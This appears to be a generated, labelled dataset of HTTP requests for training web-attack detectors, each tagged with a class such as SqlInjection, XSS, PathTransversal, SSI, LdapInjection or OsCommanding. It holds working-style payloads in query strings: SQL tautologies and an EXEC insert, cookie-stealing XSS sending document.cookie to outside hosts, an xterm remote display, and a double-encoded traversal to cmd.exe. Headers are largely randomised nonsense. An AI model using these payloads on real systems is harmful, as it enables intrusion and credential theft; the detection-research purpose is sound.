Accept-Language: toihesit-rleeea;q=0.9, rgstseh-as, xA-ta8onz0, o-9;q=0.4, Esael-ou
Cache-Control: max-age=6247
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Mon, 01 Jun 09 09:58:44 UTC
ETag: W/"tkoJK.8fzDRFrof_-"
Expect: 100-continue
From: dtehsE@fwehd4rfrs.com
If-Modified-Since: Wed, 27 Aug 08 04:00:10 GMT
If-Unmodified-Since: Fri, 04 Sep 09 23:19:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8384
MIME-Version: 5.9
Pragma: 2=fet
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: NTLM cmE0b1luZW1udHJiaWNkNW50ZWpvaW42dGVhbTJpYWhu
Range: 48895-751657,65-
Referer: /ooz3hVp/ehcneu4.sh
TE: gzip,deflate,deflate;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/9.6 (Windows; U; WinNT 1.2; ea-rn; rv:8.3.5) Gecko/09410869
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/6.7 www.eersm.tiff
Transfer-Encoding: compress
Upgrade: ye1nNS/5.5
Warning: 517 www.aoior0c.tiff:33767 "TpadeIe" 
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36288
Start - Id: 42350
class: SqlInjection
GET /gbrilpkimtgfskuf/le1Yfei/insert948include/adaHzTEm4my-tT-SYY/VQBy7/bedrodne/thp5q90esanTergibaN/vQ%uNJ/eaia/extYZtCP.htm?rctlSunr=u+&eeackAbeyqra8ce=712&tveeihdhccye=18128&j9.7=OR+25975%3D25975&mimnieIm5haew=atipqs HTTP/1.1
Host: 219.40.197.116
Connection: keep-alive
Accept: application/x-tar;q=0.7, image/*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 106.173.49.114
Cookie: Iol=1W24U_abq-q4;m8a=iTQxbYUmQup;Lace=921667
Cookie2: $Version="85"
Date: Mon, 06 Feb 06 03:39:27 CET
ETag: "OVVBmY_Rb3C9MGri_gO"
Expect: hoioeia=Artttt;msuR6sft=Rec7diI
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: "R2hLv5HkJq9lWGU3qS"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Sat, 19 Apr 08 21:50:25 GMT
Max-Forwards: 80
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic aGlzbGlvZTpyRVU0c3IwMQ==
Authorization: Basic cXJlcjp3czBzYw==
Range: -42018,-510767
Referer: /swlsa.conf
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: wiesne
UA-CPU: PowerPC
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 6.5 www.srTHo.jpeg
Transfer-Encoding: compress
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42350
Start - Id: 42139
class: SqlInjection
GET /0g/axpoUDtxV/hHtaxuHo/0eaiaaenPbe5r2qg/lndhcsbyzed/zbQi0ZZCGVvufuucaEJ/n9aqtvGOLQ19dN/mebz/no4ltt/eAe8C6giifhsroeKM/idbKAHxs9_4kfxnLvl/%uEYPUXDBDW.php?ifthelbz=fTfanayedeReHlc&thui=+ssureSn%29+ao8&c3nosiLntmg8hr=968006&VW4FXnRHx=ossja6irAu6&piirEnjrfs=qwer%27+or+++pghIg_v.Account%3D%27a5oorkm%40etee.com&aidf=havingformn&eddhAhoiree=e0neuieuhde5%27&d5=tTeovP HTTP/1.1
Host: www.me1dnmce8a.gov:80
Connection: laI3
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: MDo-hiIi5eoy
Cache-Control: only-if-cached
Client-ip: 114.28.0.8
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Wed, 21 Feb 07 11:34:02 GMT
ETag: W/"1gP-UfkTE-omaDvF6d2"
Expect: eljg7ttL=mlPtnLd
From: yaieolw@dAieet.st
If-Modified-Since: Tue, 06 Apr 10 20:31:51 GMT
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "gXtmJ1o3QKiR1Y7fdl"
If-None-Match: *
If-Range: Sat, 26 Sep 09 22:42:56 CET
Max-Forwards: 383
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Ezaest 9Tliy=nalut
Range: 80-3804,023297-91,09-
Referer: http://jer1ae.net/it19i/snadA/RdUee/grze9/sefnw7rI.js
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.1 (X11; U; Solaris 1.5; qo-ly; rv:3.7.9) Gecko/58091387
UA-CPU: StrongARM
UA-Disp: 988,870,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: HTTP/1.9 84.120.40.149, enT8/2.0 www.es3cro.gif
Transfer-Encoding: deflate
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42139
Start - Id: 47168
class: XSS
GET /izRz2/renSlFraZeG/lhwocloeCiYsaeteiww/aJVp2xeIK1lDsBir/Q_UHiTAeql/L9RoptOB/eNpVZUTqQk25ZIowi/rC0HngpAI/drmkettwlFi/xrLlobhoT.cfm?con3rven=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Balert+%28%27nfy%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E HTTP/1.0
Host: 125.120.34.84:489
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-6, x-mac-icelandic;q=0.9, big5;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 46.131.2.199
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="4"
Date: Wed, 18 May 05 03:35:04 CET
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: 100-continue
From: NVuaoa9@ley3kSmtv.uk
If-Modified-Since: Sat, 14 Oct 06 10:32:31 GMT
If-Unmodified-Since: Sat, 03 Mar 07 22:27:38 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Nov 05 13:19:13 CET
Max-Forwards: 623
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: bg4s 2nnidDeo=o6Ey
Range: -016,1-,67332-47295
Referer: http://oToos5Xt.uk/albmeewt/4heetyul/al3taa/rAakt0ai.asp
TE: trailers,gzip
Trailer: If-Match
User-Agent: ir3i/8.4.2.9.4
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: FTP/9.4 216.133.229.192:20390
Transfer-Encoding: Auhl
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 218.81.85.0
X-Serial-Number: 533969856895
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47168
Start - Id: 40769
class: SSI
PUT /1HZ/accepthWhtpassAHI@/eozeoZS/16MneoAR5USK/nR-e/Nx4/eadn/1WulBBj@echo1Bpositiondiv/grtioitoaielBgbs/mvwEoisei4lB.dll? HTTP/1.0
Content-Length: 341
Content-Language: ul4n,kOrn,c
Content-Encoding: compress
Content-Location: /oebhe/aponesah/xvn1/gerieoG.nsf
Content-MD5: ZWdodGJkQXV0ZXRhc2lvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Oct 07 10:08:56 CET
Last-Modified: Thu, 26 Aug 04 16:34:41 GMT
Host: 25.79.227.107:4439
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ghtjmah-aeeeela;q=0.6
Cache-Control: no-store
Client-ip: 166.41.33.129
Cookie: holsbfje=rinlmm14tabrcpahm;othrnoiew25af8h=sgaulhoHTtie1a
Cookie2: $Version="581"
Date: Wed, 17 Jun 09 08:16:40 CET
ETag: "-mDaC72APAXSOUm"
Expect: neiat
From: tt33en@1osNNfn.biz
If-Modified-Since: Wed, 18 Nov 09 12:29:49 UTC
If-Unmodified-Since: Sat, 10 Jul 04 08:58:33 GMT
If-Match: "aDYOLld0vd71u9yp6"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: Sat, 08 Sep 07 22:16:18 CET
Max-Forwards: 516
MIME-Version: 8.0
Pragma: ihogrE='It'
Proxy-Authorization: Basic ZW55bmVJbzpsdWxubXk=
Authorization: Digest algorithm=MD5-sess
Range: 07-9,0-,-333
Referer: http://zet7rtso.org/5yg6h.exe
TE: deflate;q=0.4,chunked;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 7.4; ay-hA; rv:1.0.1) Gecko/11034406
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 2.6 www.4ethht.html, HTTP/2.2 56.174.27.173, a0y1r/3.5 www.Bcse1d.jpeg
Transfer-Encoding: s0et
Upgrade: rhe/3.3
Warning: 967 www.drtntae.tiff "nmheag5ib" 
X-Forwarded-For: 31.100.82.188
X-Serial-Number: 844488113887015051
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jkvb=548&nos=tH1l@m2k&rlolapoooi1yRLr=Nio4ocrtaireat&n4ez=pB-&k0inBV=9aYviiiosPlaabsoim&ip3hpriordr=a%t&taotioEgl=atlnetcat&cscap2bArdtpmn6=ete&em5gcie3o2=0901713&wnh3znhRf8Gs=<!--  #odbc    statement   ="select     nthoheoa,     seHsniA,   hegn4f   from  gftweh    order by   5,     635,    3"  -->&IlWpyV=32035739

End - Id: 40769
Start - Id: 44726
class: PathTransversal
PUT /IZX1nKCWSvQT/hoeTrtjirglew/apBI/xFEOgih8eRJAIH8qRux_.tiff? HTTP/1.1
Content-Length: 232
Content-Language: ehcbitr,sibndo
Content-Encoding: gzip
Content-Location: http://Eegun.com/uae9at/shtpym/oYybo4Uo/trqtc.asp
Content-MD5: NTBUT3VuYWFsZXV1aXJoZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 04 14:54:25 GMT
Last-Modified: Wed, 27 Oct 04 03:02:06 CET
Host: www.yybnnltxo.gov
Connection: anqti3au
Accept: */*
Accept-Charset: euc-kr, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=5
Cookie: rirojEd=or~;6enfrom5zeishttpsvbscriptH9& E;b3NooMacxndhoN=sECkrpIzsc
Cookie2: $Version="8"
Date: Fri, 21 Jul 06 16:45:59 UTC
ETag: W/"p0je_Dz12UVNKDAZp9"
Expect: 3tnOdwe7=nohiayee
If-Modified-Since: Fri, 15 Aug 08 02:55:37 GMT
If-Unmodified-Since: Tue, 04 Mar 08 18:56:28 UTC
If-Match: *
If-None-Match: "@uzshwqJtWXym8e"
If-Range: Tue, 12 Jun 07 16:58:49 GMT
Max-Forwards: 635
Pragma: eyien=8ns
Authorization: Digest nonce
Referer: http://www.Tneuq.com/e4alisFr/onmsh.wmn
User-Agent: Mozilla/6.9 (X11; U; Linux i386 8.7; u1-nd; rv:5.4.5) Gecko/45477120
Via: htn/1.6 www.bHid.jpg, 8.7 241.137.9.191, 9.4 188.109.92.187
Warning: 204 40.231.234.46 "eLujf" "Wed, 31 Dec 08 20:00:10 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

8mEe=p&pop9bisoannoa=iimg&rqasgtsc=09&h39oEeierlyegt=hrewe&wmkl9hhSntvi=81938&fuhieb=wbelusr&t4nnsngyali=9718443&80ebgsoundJ-Ka=form]nI<&rjrsctdTiwefmsh=file:///a:/eta/kfgti/npE.xml&7inc==Tcsenph-/unet3;s c

End - Id: 44726
Start - Id: 47513
class: XSS
GET /oGuduTei5rd7Earnril/sfhBo0geyrpzaatnalas/rPBpSIzrPBzFf.png?l7doayecfl3pot=472&ye2eIHaheso=leineElike%3D9o+pet%3E6&EiDmafnen=Pna+tl%7C%26o&craHvoasahdaN=%3Cdiv++++style++++%3D++%22+++width%3A+++++expression%28%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.chte.com%2Fcgi-bin%2Frege.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+%3E HTTP/1.0
Host: 65.239.12.179
Connection: close
Accept: video/quicktime, text/*;q=0.5
Accept-Charset: gb2312;q=0.2, x-mac-roman;q=0.3, windows-1254
Accept-Encoding: *
Accept-Language: eh-jid;q=0.7, ytE-iheeew, e-seduiu;q=0.8
Cache-Control: no-store
Client-ip: 246.207.212.83
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="7"
Date: Mon, 22 Oct 07 14:59:04 UTC
ETag: W/"T.nifG87SHPiwpM4.IO4"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 13 Apr 06 15:53:13 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: *
If-None-Match: "_pD5dcyXFwPMooY.FNWn"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: lRetr='hhobli'
Proxy-Authorization: NTLM cnV0MXk0aWFpbmhhcm5jeGFvcWh2bnJsaEFpbTU4bmxucmJ0b2ll
Authorization: NTLM M0xpZWUxb0JjeGhmbG96NHBoaWN0d295QW0xcGFuc3I=
Range: 20-409392,508-532
Referer: http://www.a6EaIosf.st/3lnu/n4hh.txt
TE: trailers,deflate;q=0.0
Trailer: Range
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 1.0; Qy-2i; rv:5.8.8) Gecko/75307519
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 7.7 114.224.208.33
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 71.118.200.104
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47513
Start - Id: 46093
class: PathTransversal
POST /fhiRvl5xGRg7m/tfe/hohufmtsvnethraive/rlyeIieaeh/oEaMVM7JBcIEUIPZ.swf? HTTP/1.0
Content-Length: 227
Content-Language: sed,w
Content-Encoding: compress
Content-Location: /lent/iiezryu.swf
Content-MD5: aTFhdGFkd3N1aW5lcjdsTg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 25 Jun 08 02:14:13 CET
Host: www.eanE.fr:53
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 92.99.137.196
Cookie: Lm_KkQizAJP0=u.ahgmNBPetu;mHreWyrt=14112202;zn1eosm0rsdkA=tADqcC3C;eaSre=i0bsis$Fnmb(eyt;6anasstzg=aAo;lbtGnnpwmv=UG3yndehefeusesy
Cookie2: $Version="065"
Date: Fri, 15 Jan 10 06:07:02 UTC
ETag: W/"TbF8453pah_RFw4TC"
Expect: Siau=psbut;juzsygh
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 23:14:17 CET
Max-Forwards: 63
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: stfTUt reBwpr6d=aluesSr
Referer: /teleifnM/iflI.dll
TE: trailers,deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/5.8 (Windows; U; WinNT 0.1; fw-ie; rv:8.9.0) Gecko/00753829
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 7.5 www.izaed5n.html:5178, 4.2 201.40.5.226
Transfer-Encoding: compress
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ohd=mochannucs8pp\ 0hdsystem&eer=ivoowgetrvritsie4r&btelaedanW=8&88a=../../../../../../proc/version&e2=61979&ee=7080&retorred6rr= udbodyoht metaconnectQieeetcoptenph- &senhdlha=Ge+fr&2deEacceptstyle=tvtKtqTasC

End - Id: 46093
Start - Id: 43344
class: OsCommanding
GET /hbIiiewwtu/Vwxg/u7njmocepztCeryn1vr9/lBo-lJJy3v5/K5upqaZ_Y./oDlLMS@L@7XcH7c.asmx?hckarhf=%250A++++xterm++++-display+++++www.eteser.com%3A0.0&wostH=1248 HTTP/1.0
Host: www.xnmetfsoeq.it
Connection: eSLiert
Accept: video/*, video/*
Accept-Charset: iso-8859-9;q=0.3, macintosh;q=0.1
Accept-Encoding: 
Accept-Language: et-a3lliz;q=0.3, iSho6he-de, eiRezOh-c
Cache-Control: only-if-cached
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="732"
Date: Thu, 10 May 07 24:52:23 CET
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Sat, 31 Jan 09 10:10:29 CET
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: *
If-None-Match: "jX5ohiZcI@m6RCZ"
If-Range: *
Max-Forwards: 499
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: desngn piBmna=tHse
Range: -3
Referer: /rYsr/nNaeoo/de0rdr.css
TE: trailers,trailers
Trailer: From
User-Agent: hu4r (xeObENW; eACA@3ks; ai4qndiSQ; 8SLdqYV1Nv; e_q8oBVA)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: 9.8 44.177.7.59, 7.9 www.0tso.jpg, 6.0 www.naoe5uRo.shtml
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 673 www.eotg.jpeg "ttFtvipf" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43344
Start - Id: 47160
class: XSS
GET /n9/er1ateD0lnet83rqnr.nsf?caa=ahco&sc=toc3ao5cnniw&tas0ne0qeotw=e1sob&vNsDQ=%3Cdiv++onmouseover++%3D++++%22++++%5Bwindow.open%28%27http%3A%2F%2F175.135.184.86%2Fniieme.jsp%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E HTTP/1.1
Host: 164.97.71.229:85
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: edmhyfo-oelpreel;q=0.4
Cache-Control: no-store
Client-ip: 123.54.69.161
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="825"
Date: Thu, 16 Nov 06 10:02:41 UTC
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: encgtiSj
From: rRktr@tnrerr.uk
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: *
If-None-Match: "eoLhxPyu.-MTfKxcRM"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 2851
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://inVTtawm.st/ooW0/7th0rrge.aspx
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: Mozilla/5.1 (compatible; MSIE 4.6; Solaris; aSezhg)
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47160
Start - Id: 37656
class: LdapInjection
POST /elnxLrru/ohhe/msFhonlrdsq0hrooo.js? HTTP/1.0
Content-Length: 278
Content-Language: e,vo
Content-Encoding: deflate
Content-Location: http://risytn.com/zl4e/Slhmst/7olso.mspx
Content-MD5: c3lsbnRhaWkxYWJubnJoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 119.30.89.194
Connection: jdrn
Accept: */*;q=0.4
Accept-Charset: iso-8859-6, iso-8859-1, utf-8
Accept-Encoding: compress, compress;q=0.1, deflate;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-age=564
Client-ip: 88.224.210.21
Cookie: mdodolaak=6815;vsteh=leso;nehvrNday1d=e$og;aa2lyoRhaete=afe noad
Cookie2: $Version="878"
Date: Fri, 15 Jan 10 04:42:10 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: dI7o=fopMiaaa;che6mei=fphDmee
From: p9ot@shsomno.org
If-Modified-Since: Sun, 07 Nov 04 01:14:40 UTC
If-Unmodified-Since: Sun, 10 Dec 06 08:43:19 CET
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.2
Pragma: ww=oey
Proxy-Authorization: Digest username="oowuyy"
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://ks5Ai.cz/ybqirev/ht7ohen/nyiPAiu/tcesd4ot.gif
TE: deflate;q=0.0,chunked
Trailer: Accept
User-Agent: Mozilla/2.0 (compatible; raei; Open BSD i586; batasa4ee; 3pfrniC)
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 0.2 106.203.148.102, 5.8 125.243.138.139
Transfer-Encoding: wte6ed
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kR6li2a=nl@6G8J0LG&uil=tsretmab&ero1&sdheeDolrtfr=0W0kyq--2Dd&Sreixeslea=s6HS73S&wri5rte=bzUi.QeaDu&bn=i2\3tstfp&phpflinkZIf=oeL&yxABUThavingu_=l1uerwshpa7hgp&OrTgjWq2L9=Tservices(%u&crWs=8906&kta7loarerY=)  (    | (tbh=hstsa*)&jzF7v=1&bliibHbaeaioy=bO1XYw

End - Id: 37656
Start - Id: 41686
class: SqlInjection
GET /xJ0eChg_i1JuHt0daa/gfbagioldaie3Luaetei/pna5lAzndzlNet/uEfidnG/tQ6oKFNV8pWnVcJ.tiff?rjurhuiissadRr=%3B++EXEC%28+%27INS%27%2B%27ERT++INTO++++users++values%284030%2C%27ft%27%2C%27ihq%27%29%29&resrrra6mfH=4448 HTTP/1.1
Host: 58.90.151.100
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: koi8;q=0.0, x-mac-roman, windows-1258;q=0.5, x-mac-icelandic, iso-8859-3
Accept-Encoding: compress;q=0.6, identity;q=0.9, deflate
Accept-Language: *;q=0.6
Cache-Control: max-age=6977
Client-ip: 106.39.43.168
Cookie: th=@cscriptm;execVbetweenIconnectSx95=lirdon8ssvhcopenW
Cookie2: $Version="1"
Date: Sun, 18 Jan 04 03:30:35 UTC
ETag: "_JdHqc5lPurFiLmz"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Wed, 28 Jan 09 20:35:06 CET
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: "1TjoPZvynQQX@yLAV"
Max-Forwards: 1
MIME-Version: 7.5
Pragma: pmhldf=lo
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: 87689-74,-52021,11-
Referer: /oEmesWp/wdtolk/rie9its/xdeieTil.swf
TE: trailers
Trailer: Max-Forwards
User-Agent: oFclmlChpsaaa7aw
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/7.4 www.ihvDi.css, rnTnt/1.3 129.35.107.153, 4.1 32.11.238.71
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41686
Start - Id: 37205
class: LdapInjection
GET /ltfeeatempbire3es/Ate9nbnwRddao/mWihKrsx0TBbVVItr/htUaD.shtml?pkwheregR=%29+++%28++++%7C+++%28dniii%3Deio*%29 HTTP/1.0
Host: 91.188.103.112
Connection: o7ex
Accept: */*
Accept-Charset: iso-8859-3;q=0.5, windows-1251, big5, hz-gb-2312;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 163.27.72.204
Cookie: Esoclanua=etrrmneOnttqgeia;access_logUvsC4M9y=0h;3an5ltrtnjae=i;cse=54834;bn=3;ggliwe8sifo7=n-cqsc
Cookie2: $Version="690"
Date: Sun, 28 Sep 08 09:45:05 UTC
ETag: "Cq6r9kXQ5YmgE6FrHz."
Expect: 100-continue
From: eeunxlw9@20loa9is.it
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Fri, 09 Nov 07 20:17:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3039
MIME-Version: 2.5
Pragma: shmoapr8=phcsroay
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: NTLM ZWJNbGVhc0xpaWFmcGF0b3NzYXNtZWV1b29BY2V0bjZpZHRucWxlVTJy
Range: 605-286224
Referer: /ojwpn.gif
TE: deflate,gzip,chunked;q=0.9
Trailer: Trailer
User-Agent: a0g1gEb (ajqvwdZd; er7Tqkyx; iIrgeSD; bz6c8UUT)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x8291
Via: jtt1/5.0 www.oidn.htm, HTTP/7.4 www.hnrduhow.png:3247
Transfer-Encoding: identity
Upgrade: 8sqee/1.6, vgyN05/7.5, hmf/0.6
Warning: 705 111.117.142.154:432 "1hEtaiekdinrmrce" 
X-Forwarded-For: 209.47.70.154
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37205
Start - Id: 44103
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.aaod2tN.de
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: utf-8, x-mac-greek;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: min-fresh=79407
Client-ip: 236.2.174.53
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Wed, 01 Mar 06 08:30:39 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Mon, 03 Nov 08 21:50:21 CET
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
